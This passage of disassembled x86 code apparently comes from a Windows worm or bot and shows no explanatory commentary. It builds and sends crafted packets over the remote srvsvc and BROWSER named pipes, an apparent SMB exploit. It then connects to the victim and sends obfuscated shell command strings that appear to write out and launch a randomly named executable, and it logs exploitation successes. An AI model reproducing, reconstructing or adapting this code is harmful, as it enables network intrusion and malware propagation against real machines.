push eax
push eax
lea eax, [ebp+var_90]
push eax
call sub_4290C4
loc_405E6F: ; CODE XREF: sub_405C99+18F�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeSrvsvc ; "\\\\%s\\pipe\\srvsvc"
lea eax, [ebp+var_40DC]
push edi
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_CC], eax
jz loc_4063B9
loc_405EB4: ; CODE XREF: sub_405C99+177�j
push 48h
lea eax, [ebp+var_D8]
push ebx
push eax
call sub_429760
push 10h
mov [ebp+var_D8], 5
pop eax
mov [ebp+var_D7], bl
mov [ebp+var_D4], eax
push eax
lea eax, [ebp+var_B8]
push offset dword_43E170
push eax
mov [ebp+var_D6], 0Bh
mov [ebp+var_D5], 3
mov [ebp+var_D0], 48h
mov [ebp+var_CE], bx
mov [ebp+var_CC], ebx
mov [ebp+var_C8], 10B8h
mov [ebp+var_C6], 10B8h
mov [ebp+var_C4], ebx
mov [ebp+var_C0], 1
mov [ebp+var_BC], bx
mov [ebp+var_BA], 1
call sub_429420
push 10h
lea eax, [ebp+var_A4]
push offset dword_43E15C
push eax
mov [ebp+var_A8], 3
call sub_429420
add esp, 24h
lea eax, [ebp+var_DC]
mov [ebp+var_94], 2
push ebx
push eax
lea eax, [ebp+var_D8]
push 48h
push eax
push [ebp+arg_CC]
call dword_437078 ; WriteFile
test eax, eax
jz loc_406058
lea eax, [ebp+var_14]
push ebx
push eax
lea eax, [ebp+var_60DC]
push edi
push eax
push [ebp+arg_CC]
call dword_437084 ; ReadFile
push ebx
call sub_42A7D5
push eax
call sub_429B8F
push 14h
lea eax, [ebp+var_70]
push 41h
push eax
call sub_429760
push 1Ch
lea eax, [ebp+var_30]
push 41h
push eax
call sub_429760
add esp, 20h
call sub_429B9C
mov [ebp+var_70], eax
xor eax, eax
inc eax
cmp byte_43E0B0[esi], bl
mov dword ptr [ebp+var_68+4], eax
mov dword ptr [ebp+var_68], ebx
mov [ebp+var_6C], eax
mov [ebp+var_60], bx
jz short loc_405FF9
push 4
push offset dword_4553A4
jmp short loc_40600B
; ---------------------------------------------------------------------------
loc_405FF9: ; CODE XREF: sub_405C99+355�j
cmp byte_43E0B1[esi], bl
jz short loc_406020
push 2
pop eax
push 4
push offset loc_43E154
loc_40600B: ; CODE XREF: sub_405C99+35E�j
mov [ebp+var_2C], eax
mov [ebp+var_24], eax
lea eax, [ebp+var_20]
mov [ebp+var_28], ebx
push eax
call sub_429420
add esp, 0Ch
loc_406020: ; CODE XREF: sub_405C99+366�j
call sub_429B9C
mov edi, 0FAh
cdq
mov ecx, edi
idiv ecx
inc edx
mov [ebp+var_30], edx
call sub_429B9C
cdq
idiv edi
mov eax, dword_43E0A4[esi]
mov [ebp+var_18], ebx
push eax
mov [ebp+var_4], eax
inc edx
mov [ebp+var_1C], edx
call sub_4297B8
mov edi, eax
pop ecx
cmp edi, ebx
jnz short loc_406069
loc_406058: ; CODE XREF: sub_405C99+2EF�j
push [ebp+arg_CC]
call dword_437044 ; CloseHandle
jmp loc_4063B9
; ---------------------------------------------------------------------------
loc_406069: ; CODE XREF: sub_405C99+3BD�j
mov eax, [ebp+var_4]
add eax, 0FFFFFFFEh
push eax
push 90h
push edi
call sub_429760
mov eax, [ebp+var_4]
push 2
push ebx
lea eax, [edi+eax-2]
push eax
call sub_429760
mov eax, dword_43E0AC[esi]
push 7
add eax, edi
push offset dword_43E098
push eax
mov [ebp-8], eax
call sub_429420
push dword_43E0CC
mov eax, [ebp-8]
add eax, 7
push offset dword_43A8E8
push eax
call sub_429420
mov eax, dword_43E0A8[esi]
add esp, 30h
cmp byte_43E0B0[esi], bl
mov [ebp-8], eax
jz short loc_40611B
push 4
add eax, edi
push offset dword_455394
push eax
call sub_429420
add dword ptr [ebp-8], 0Ch
mov esi, offset dword_43E0C8
mov eax, [ebp-8]
push 4
add eax, edi
push esi
push eax
call sub_429420
mov eax, [ebp-8]
push 4
push esi
lea eax, [eax+edi+24h]
push eax
mov [ebp-8], eax
call sub_429420
mov eax, [ebp-8]
push 4
add eax, 0Ch
push esi
push eax
call sub_429420
add esp, 30h
jmp short loc_40614B
; ---------------------------------------------------------------------------
loc_40611B: ; CODE XREF: sub_405C99+433�j
cmp byte_43E0B1[esi], bl
jz short loc_40614B
add eax, edi
mov dword ptr [ebp+var_10], 10h
mov [ebp-8], eax
mov esi, offset dword_43E0C8
loc_406134: ; CODE XREF: sub_405C99+4B0�j
push 4
push esi
push dword ptr [ebp-8]
call sub_429420
add dword ptr [ebp-8], 4
add esp, 0Ch
dec dword ptr [ebp+var_10]
jnz short loc_406134
loc_40614B: ; CODE XREF: sub_405C99+480�j
; sub_405C99+488�j
mov eax, [ebp+var_4]
add eax, 42h
push eax
call sub_4297B8
mov esi, eax
pop ecx
cmp esi, ebx
mov dword ptr [ebp+var_10], esi
jnz short loc_406179
push [ebp+arg_CC]
call dword_437044 ; CloseHandle
push edi
call sub_4298F2
pop ecx
jmp loc_4063B9
; ---------------------------------------------------------------------------
loc_406179: ; CODE XREF: sub_405C99+4C6�j
mov eax, [ebp+var_4]
add eax, 42h
push eax
push ebx ; double
push esi
call sub_429760
lea eax, [ebp+var_70]
push 14h
push eax
push esi
call sub_429420
mov eax, [ebp+var_4]
mov [ebp-8], ebx
mov dword ptr [ebp+var_10+4], eax
add esp, 10h
fild [ebp+var_10+4]
fmul flt_437300
fstp [esp+10h+var_10]
call sub_42A706
call sub_42A9E0
push [ebp+var_4]
mov [esi+1Ch], eax
mov [esi+14h], eax
lea eax, [esi+20h]
push edi
push eax
mov [esi+18h], ebx
call sub_429420
mov eax, [ebp+var_4]
add esp, 14h
add eax, 20h
test al, 3
mov [ebp-8], eax
jz short loc_4061E3
loc_4061DB: ; CODE XREF: sub_405C99+545�j
inc eax
test al, 3
jnz short loc_4061DB
mov [ebp-8], eax
loc_4061E3: ; CODE XREF: sub_405C99+540�j
lea ecx, [ebp+var_30]
push 1Ch
add eax, esi
push ecx
push eax
call sub_429420
add dword ptr [ebp-8], 1Ch
push edi
call sub_4298F2
push 18h
lea eax, [ebp+var_48]
push ebx
push eax
call sub_429760
push 14h
lea eax, [ebp+var_5C]
push ebx
push eax
mov [ebp+var_48], 5
mov [ebp+var_47], bl
mov [ebp+var_46], bl
mov [ebp+var_45], 3
mov [ebp+var_44], 10h
mov [ebp+var_3E], bx
mov [ebp+var_3C], ebx
mov [ebp+var_34], bx
mov [ebp+var_32], 1Fh
call sub_429760
add esp, 28h
push ebx
push ebx
push 1
push ebx
call dword_437080 ; CreateEventA
mov [ebp+var_4C], eax
mov [ebp+var_4], ebx
jmp short loc_406252
; ---------------------------------------------------------------------------
loc_40624F: ; CODE XREF: sub_405C99+5F7�j
; sub_405C99+63E�j
mov esi, dword ptr [ebp+var_10]
loc_406252: ; CODE XREF: sub_405C99+5B4�j
cmp [ebp+var_4], 2
jge loc_406390
push 1
push 10B8h
push dword ptr [ebp-8]
inc [ebp+var_4]
push esi
lea esi, [ebp+var_48]
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_CC]
rep movsd
call sub_405BAB
add esp, 2Ch
test al, al
jz loc_40638D
cmp [ebp+var_4C], ebx
jz short loc_40624F
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_60DC]
push 2000h
push eax
push [ebp+arg_CC]
call dword_437084 ; ReadFile
test eax, eax
jnz short loc_4062C7
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 3E5h
jnz loc_4063B9
loc_4062C7: ; CODE XREF: sub_405C99+61B�j
push 64h
push [ebp+var_4C]
call dword_43707C ; WaitForSingleObject
cmp eax, 102h
jnz loc_40624F
push 7D0h
call dword_437190 ; Sleep
movzx eax, word_44399E
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
mov edx, [ebp+arg_B4]
add esp, 0C8h
mov eax, edx
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
shl eax, 6
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_40635C
cmp [ebp+arg_BC], ebx
jnz short loc_406364
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_40635C: ; CODE XREF: sub_405C99+697�j
cmp [ebp+arg_BC], ebx
jz short loc_406388
loc_406364: ; CODE XREF: sub_405C99+69F�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
loc_406388: ; CODE XREF: sub_405C99+6C9�j
xor eax, eax
inc eax
jmp short loc_4063BB
; ---------------------------------------------------------------------------
loc_40638D: ; CODE XREF: sub_405C99+5EE�j
mov esi, dword ptr [ebp+var_10]
loc_406390: ; CODE XREF: sub_405C99+5BD�j
lea eax, [ebp+arg_8]
push eax
call sub_401E9E
mov edi, dword_437044
pop ecx
push [ebp+arg_CC]
call edi ; dword_437044
push esi
call sub_4298F2
cmp [ebp+var_4C], ebx
pop ecx
jz short loc_4063B9
push [ebp+var_4C]
call edi ; dword_437044
loc_4063B9: ; CODE XREF: sub_405C99+167�j
; sub_405C99+215�j ...
xor eax, eax
loc_4063BB: ; CODE XREF: sub_405C99+6F2�j
pop edi
pop esi
pop ebx
leave
retn
sub_405C99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4063C0 proc near ; CODE XREF: sub_406D7F+46D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+arg_8]
push ebx
push eax
call sub_404525
pop ecx
test eax, eax
pop ecx
jnz short loc_4063E6
lea eax, [ebp+arg_8]
push 5
push eax
call sub_404525
pop ecx
pop ecx
loc_4063E6: ; CODE XREF: sub_4063C0+17�j
cmp eax, ebx
jnz short loc_4063EE
loc_4063EA: ; CODE XREF: sub_4063C0+31�j
push 0
jmp short loc_4063F9
; ---------------------------------------------------------------------------
loc_4063EE: ; CODE XREF: sub_4063C0+28�j
cmp eax, 2
jz short loc_4063EA
cmp eax, 3
jnz short loc_406422
push ebx
loc_4063F9: ; CODE XREF: sub_4063C0+2C�j
sub esp, 0C4h
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_4]
rep movsd
push [ebp+arg_0]
call sub_405C99
add esp, 0D0h
test eax, eax
jz short loc_406422
mov eax, ebx
jmp short loc_406424
; ---------------------------------------------------------------------------
loc_406422: ; CODE XREF: sub_4063C0+36�j
; sub_4063C0+5C�j
xor eax, eax
loc_406424: ; CODE XREF: sub_4063C0+60�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4063C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406429 proc near ; DATA XREF: sub_4066E2+13C�o
var_6A0 = byte ptr -6A0h
var_2A0 = byte ptr -2A0h
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6A0h
mov eax, [ebp+arg_0]
push ebx
push esi
xor esi, esi
inc esi
push edi
mov [eax+0BCh], esi
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_10], 2
push dword_454F60
call dword_456F7C ; inet_addr
mov [ebp+var_C], eax
mov ax, word_44399E
push eax
call dword_456F38 ; ntohs
push ebx
push esi
push 2
mov [ebp+var_E], ax
call dword_456FD0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_4066B1
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call dword_456EBC ; connect
cmp eax, 0FFFFFFFFh
jz loc_4066B1
push ebx
lea eax, [ebp+var_6A0]
push 400h
push eax
push edi
call dword_456F58 ; recv
call sub_429B9C
push 9
pop esi
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
push edx
call sub_429B9C
cdq
idiv esi
lea eax, [ebp+var_2A0]
push edx
push offset dword_4439B4
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429B03
add esp, 20h
cmp dword_456DA8, ebx
jnz loc_4065BD
push dword_454F60
call sub_41E4C1
test eax, eax
pop ecx
mov [ebp+arg_0], offset dword_457CF8
jnz short loc_406532
mov [ebp+arg_0], offset dword_457C40
loc_406532: ; CODE XREF: sub_406429+100�j
lea eax, [ebp+var_2A0]
push eax
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
lea eax, [ebp+var_2A0]
push eax
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
call sub_401A77
push eax
call sub_401A77
push eax
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_454A30
lea eax, [ebp+var_1A0]
push [ebp+arg_0]
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSSSS ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429BBE
add esp, 60h
jmp loc_40664A
; ---------------------------------------------------------------------------
loc_4065BD: ; CODE XREF: sub_406429+E5�j
mov ebx, offset dword_456BA8
push ebx
push offset aAqq27_7qqv10 ; "AQQ27.7qQv10"
call sub_401AF0
push eax
push offset aJsuah_0_mmw0zb ; "JsuAH.0.mmW0zbFKT0RKhRb0"
call sub_401AF0
push eax
mov esi, offset aVxppy0owq7d ; "VxPpy0owQ7D/"
push offset aLvk_hHddio0 ; "Lvk.H/hddio0"
push esi
call sub_401AF0
push eax
push ebx
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
push esi
call sub_401AF0
push eax
push offset aEih0f1gakfp0 ; "EiH0f1GakFP0"
push esi
call sub_401AF0
push eax
push offset dword_4569A8
push offset dword_4567A8
push offset aVgh9x1uWay0 ; "VgH9X1u/wAY0"
push esi
call sub_401AF0
push eax
mov esi, 190h
push dword_4567A0
lea eax, [ebp+var_1A0]
push offset dword_4565A0
push offset aW50oj_ac8ak0 ; "w50OJ.ac8AK0"
push offset a_9fty1n2tM_ ; ".9ftY1N2T/m."
push offset aSSSDSSSSSSSS_0 ; "%s %s %s %d >> %s %s %s %s %s >> %s %s "...
push esi
push eax
call sub_429BBE
add esp, 6Ch
xor ebx, ebx
loc_40664A: ; CODE XREF: sub_406429+18F�j
lea eax, [ebp+var_1A0]
push ebx
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jz short loc_4066B1
push esi
call dword_437190 ; Sleep
lea eax, [ebp+var_2A0]
push eax
push offset aS_6 ; "%s\r\n"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_429BBE
add esp, 10h
lea eax, [ebp+var_1A0]
push ebx
push eax
call sub_4293A0
pop ecx
push eax
lea eax, [ebp+var_1A0]
push eax
push edi
call dword_456F8C ; send
cmp eax, 0FFFFFFFFh
jnz short loc_4066B5
loc_4066B1: ; CODE XREF: sub_406429+5E�j
; sub_406429+74�j ...
xor eax, eax
jmp short loc_4066DB
; ---------------------------------------------------------------------------
loc_4066B5: ; CODE XREF: sub_406429+286�j
xor esi, esi
push ebx
lea eax, [ebp+var_6A0]
push 400h
inc esi
push eax
push edi
mov dword_4553A0, esi
call dword_456F58 ; recv
push edi
call dword_456FF0 ; closesocket
mov eax, esi
loc_4066DB: ; CODE XREF: sub_406429+28A�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_406429 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4066E2 proc near ; CODE XREF: sub_406D7F+2CB�p
var_340 = byte ptr -340h
var_23C = byte ptr -23Ch
var_138 = byte ptr -138h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
sub esp, 340h
lea eax, [ebp+arg_8]
push ebx
mov dword_454F60, eax
mov eax, [ebp+arg_BC]
mov dword_455398, eax
mov eax, [ebp+arg_C4]
mov dword_45539C, eax
mov eax, [ebp+arg_B4]
push esi
push edi
shl eax, 6
push 6
xor edi, edi
add eax, offset dword_43A357
push 1
push 2
mov [ebp+var_14], edi
mov dword_454AD8, eax
call dword_4372BC ; socket
push 480h
mov esi, offset dword_454AE0
push edi
push esi
mov [ebp+var_8], 20804h
call sub_429760
push 42Ah
mov ebx, offset dword_454F68
push 0FFFFFF90h
push ebx
call sub_429760
lea eax, [ebp+arg_8]
push 5
push eax
call sub_404525
add esp, 20h
cmp eax, 9
mov [ebp+var_10], eax
jz short loc_4067E7
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_23C]
push offset aSPipe ; "\\\\%s\\PIPE"
push eax
call sub_429B03
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_340]
push offset aSPipeBrowser ; "\\\\%s\\PIPE\\BROWSER"
push eax
call sub_429B03
lea eax, [ebp+var_23C]
add esp, 18h
mov [ebp+var_20], eax
mov eax, offset byte_454A54
push edi
push eax
push eax
lea eax, [ebp+var_34]
push eax
mov [ebp+var_30], edi
mov [ebp+var_24], edi
mov [ebp+var_18], edi
call sub_4290C4
push edi
push edi
push 3
push edi
push edi
lea eax, [ebp+var_340]
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jnz short loc_4067EE
push eax
call dword_437044 ; CloseHandle
loc_4067E7: ; CODE XREF: sub_4066E2+8C�j
xor eax, eax
jmp loc_406C64
; ---------------------------------------------------------------------------
loc_4067EE: ; CODE XREF: sub_4066E2+FC�j
lea ecx, [ebp+var_4]
push edi
push ecx
lea ecx, [ebp+var_138]
push 104h
push ecx
push 48h
push offset dword_43E0F0
push eax
call dword_437058 ; TransactNamedPipe
test eax, eax
jz loc_406C59
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+arg_8]
push edi
push eax
push offset sub_406429
push edi
push edi
call dword_437180 ; CreateThread
cmp [ebp+var_10], 2
jz loc_406A31
cmp [ebp+var_10], 1
jz loc_406A31
cmp [ebp+var_10], 3
jnz loc_406C4F
push dword_43E13C
push offset dword_43A8E8
push ebx
call sub_429420
mov eax, [ebp+var_8]
push 4
add eax, 6
pop ebx
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push ebx
push eax
push offset dword_4551CC
call sub_429420
lea eax, [ebp+var_8]
push ebx
push eax
push offset dword_4551D8
call sub_429420
lea eax, [ebp+var_8]
push ebx
push eax
push offset dword_4551FC
call sub_429420
lea eax, [ebp+var_8]
push ebx
push eax
push offset dword_455208
call sub_429420
push 2
push offset dword_4553AC
push offset dword_45522C
call sub_429420
add esp, 48h
lea eax, [ebp+var_4]
mov [ebp+var_4], 31Ch
push 2
push eax
push offset dword_43E0D8
call sub_429420
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_43E0E0
mov [ebp+var_4], 304h
call sub_429420
push 18h
push offset dword_43E0D0
push esi
call sub_429420
mov esi, offset dword_43E1D0
push ebx
push esi
push offset dword_454AF8
call sub_429420
push ebx
push esi
push offset dword_454AFC
call sub_429420
mov edi, offset dword_4553A4
push ebx
push edi
push offset dword_454B00
call sub_429420
add esp, 48h
push ebx
push esi
push offset dword_454B04
call sub_429420
push ebx
push edi
push offset dword_454B08
call sub_429420
push ebx
push offset dword_43E1C8
push offset dword_454B0C
call sub_429420
push ebx
push edi
push offset dword_454B10
call sub_429420
push ebx
push offset dword_43E1C8
push offset dword_454B14
call sub_429420
push 2C6h
push offset dword_454F68
push offset dword_454B18
call sub_429420
add esp, 48h
push ebx
push esi
push offset dword_454DE0
call sub_429420
push ebx
push esi
push offset dword_454DE4
call sub_429420
push ebx
push edi
push offset dword_454DE8
call sub_429420
push ebx
push esi
push offset dword_454DEC
call sub_429420
push ebx
push edi
push offset dword_454DF0
call sub_429420
push ebx
push esi
push offset dword_454DF4
call sub_429420
add esp, 48h
push ebx
push edi
push offset dword_454DF8
call sub_429420
add esp, 0Ch
lea eax, [ebp+var_4]
mov ebx, 104h
mov esi, dword_437058
push 0
push eax
lea eax, [ebp+var_138]
push ebx
mov edi, 31Ch
push eax
push edi
push offset dword_454AE0
push [ebp+var_C]
call esi ; dword_437058
cmp [ebp+var_4], 0
jz short loc_406A1F
lea eax, [ebp+var_4]
push 0
push eax
lea eax, [ebp+var_138]
push ebx
push eax
push edi
push offset dword_454AE0
push [ebp+var_C]
call esi ; dword_437058
loc_406A1F: ; CODE XREF: sub_4066E2+322�j
push 7D0h
call dword_437190 ; Sleep
xor ebx, ebx
jmp loc_406BC7
; ---------------------------------------------------------------------------
loc_406A31: ; CODE XREF: sub_4066E2+14D�j
; sub_4066E2+157�j
push dword_43E13C
push offset dword_43A8E8
push offset dword_4551C0
call sub_429420
add esp, 0Ch
mov edi, offset dword_455350
push 4
pop ebx
loc_406A51: ; CODE XREF: sub_4066E2+385�j
lea eax, [ebp+var_8]
push ebx
push eax
push edi
call sub_429420
add edi, ebx
add esp, 0Ch
cmp edi, offset dword_455390
jl short loc_406A51
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_43E0D8
mov [ebp+var_4], 480h
call sub_429420
lea eax, [ebp+var_4]
push 2
push eax
push offset dword_43E0E0
mov [ebp+var_4], 464h
call sub_429420
push 18h
push offset dword_43E0D0
push esi
call sub_429420
mov esi, offset dword_43E1D0
push ebx
push esi
push offset dword_454AF8
call sub_429420
push ebx
push esi
push offset dword_454AFC
call sub_429420
mov edi, offset dword_4553A4
push ebx
push edi
push offset dword_454B00
call sub_429420
add esp, 48h
push ebx
push esi
push offset dword_454B04
call sub_429420
push ebx
push edi
push offset dword_454B08
call sub_429420
push ebx
push offset dword_43E1C0
push offset dword_454B0C
call sub_429420
push ebx
push edi
push offset dword_454B10
call sub_429420
push ebx
push offset dword_43E1C0
push offset dword_454B14
call sub_429420
push 428h
push offset dword_454F68
push offset dword_454B18
call sub_429420
add esp, 48h
push ebx
push esi
push offset dword_454F44
call sub_429420
push ebx
push offset dword_43E1B8
push offset dword_454F48
call sub_429420
push ebx
push edi
push offset dword_454F4C
call sub_429420
push ebx
push offset dword_43E1B8
push offset dword_454F50
call sub_429420
push ebx
push offset loc_43E154
push offset dword_454F54
call sub_429420
push ebx
push esi
push offset dword_454F58
call sub_429420
add esp, 48h
push ebx
push edi
push offset dword_454F5C
call sub_429420
add esp, 0Ch
xor ebx, ebx
lea eax, [ebp+var_4]
push ebx
push eax
lea eax, [ebp+var_138]
push 104h
push eax
push 480h
push offset dword_454AE0
push [ebp+var_C]
call dword_437058 ; TransactNamedPipe
push 7D0h
call dword_437190 ; Sleep
loc_406BC7: ; CODE XREF: sub_4066E2+34A�j
cmp dword_4553A0, ebx
jz short loc_406C4C
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp dword_45539C, ebx
mov ecx, [ecx]
jz short loc_406C20
cmp dword_455398, ebx
jnz short loc_406C28
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_406C20: ; CODE XREF: sub_4066E2+512�j
cmp dword_455398, ebx
jz short loc_406C4C
loc_406C28: ; CODE XREF: sub_4066E2+51A�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
loc_406C4C: ; CODE XREF: sub_4066E2+4EB�j
; sub_4066E2+544�j
xor edi, edi
inc edi
loc_406C4F: ; CODE XREF: sub_4066E2+161�j
lea eax, [ebp+arg_8]
push eax
call sub_401E9E
pop ecx
loc_406C59: ; CODE XREF: sub_4066E2+12D�j
push [ebp+var_C]
call dword_437044 ; CloseHandle
mov eax, edi
loc_406C64: ; CODE XREF: sub_4066E2+107�j
pop edi
pop esi
pop ebx
leave
retn
sub_4066E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C69 proc near ; CODE XREF: sub_407281+3F�p
var_4 = byte ptr -4
arg_8 = byte ptr 10h
arg_110 = dword ptr 118h
arg_138 = dword ptr 140h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_110], 0FFFFFFFFh
push edi
jz loc_406D7C
push 0Ch
call sub_423800
test eax, eax
pop ecx
jnz loc_406D7C
xor edi, edi
cmp dword_457F68, edi
jnz short loc_406CB8
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
pop ecx
call sub_429B9C
cdq
mov ecx, 9CBDh
idiv ecx
inc edx
mov dword_4555C4, edx
jmp short loc_406CC4
; ---------------------------------------------------------------------------
loc_406CB8: ; CODE XREF: sub_406C69+2A�j
movzx eax, word_44399A
mov dword_4555C4, eax
loc_406CC4: ; CODE XREF: sub_406C69+4D�j
push esi
mov esi, offset dword_4553B4
push 104h
push esi
push edi
mov dword_4555C0, edi
call dword_43717C ; GetModuleFileNameA
push 103h
push offset dword_4439A8
push offset dword_4554B8
call sub_429D10
lea eax, [ebp+arg_8]
push 7Fh
push eax
push offset dword_4555C8
mov dword_455654, edi
call sub_429D10
mov eax, [ebp+arg_138]
push esi
push dword_4555C4
mov dword_455658, eax
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push offset a5oke1awbzq ; "5OkE/1AWBZq/"
push offset aJt17j1imtvd1 ; "jt17J1ImTVD1"
push offset aSSSIFileS_ ; "%s %s, %s: %i, File: %s."
push 0Ch
call sub_4234A7
add esp, 34h
mov dword_4555BC, eax
lea eax, [ebp+var_4]
push eax
push edi
push offset dword_4553B0
push offset sub_402CE9
push edi
push edi
call dword_437180 ; CreateThread
mov ecx, dword_4555BC
pop esi
imul ecx, 2724h
cmp eax, edi
mov dword_46D72C[ecx], eax
jz short loc_406D7C
jmp short loc_406D74
; ---------------------------------------------------------------------------
loc_406D6C: ; CODE XREF: sub_406C69+111�j
push 32h
call dword_437190 ; Sleep
loc_406D74: ; CODE XREF: sub_406C69+101�j
cmp dword_455654, edi
jz short loc_406D6C
loc_406D7C: ; CODE XREF: sub_406C69+C�j
; sub_406C69+1C�j ...
pop edi
leave
retn
sub_406C69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D7F proc near ; DATA XREF: sub_407281+B0�o
var_210 = byte ptr -210h
var_200 = byte ptr -200h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_14C = dword ptr -14Ch
var_144 = byte ptr -144h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 210h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Eh
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
xor esi, esi
push 10h
inc esi
push 0
mov [eax+134h], esi
mov eax, [ebp+var_14C]
mov [ebp+arg_0], eax
lea eax, [ebp+var_14]
push eax
call sub_429760
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_44]
call dword_456F38 ; ntohs
mov [ebp+var_12], ax
mov eax, [ebp+var_30]
push 6
push esi
push 2
mov [ebp+var_10], eax
call dword_456FD0 ; socket
push offset dword_457C40
mov edi, eax
push [ebp+var_30]
mov [ebp+var_4], edi
call dword_456FDC ; inet_ntoa
mov esi, dword_437178
push eax
call esi ; dword_437178
test eax, eax
jz loc_407278
push offset dword_457CF8
push [ebp+var_30]
call dword_456FDC ; inet_ntoa
push eax
call esi ; dword_437178
test eax, eax
jz loc_407278
cmp edi, 0FFFFFFFFh
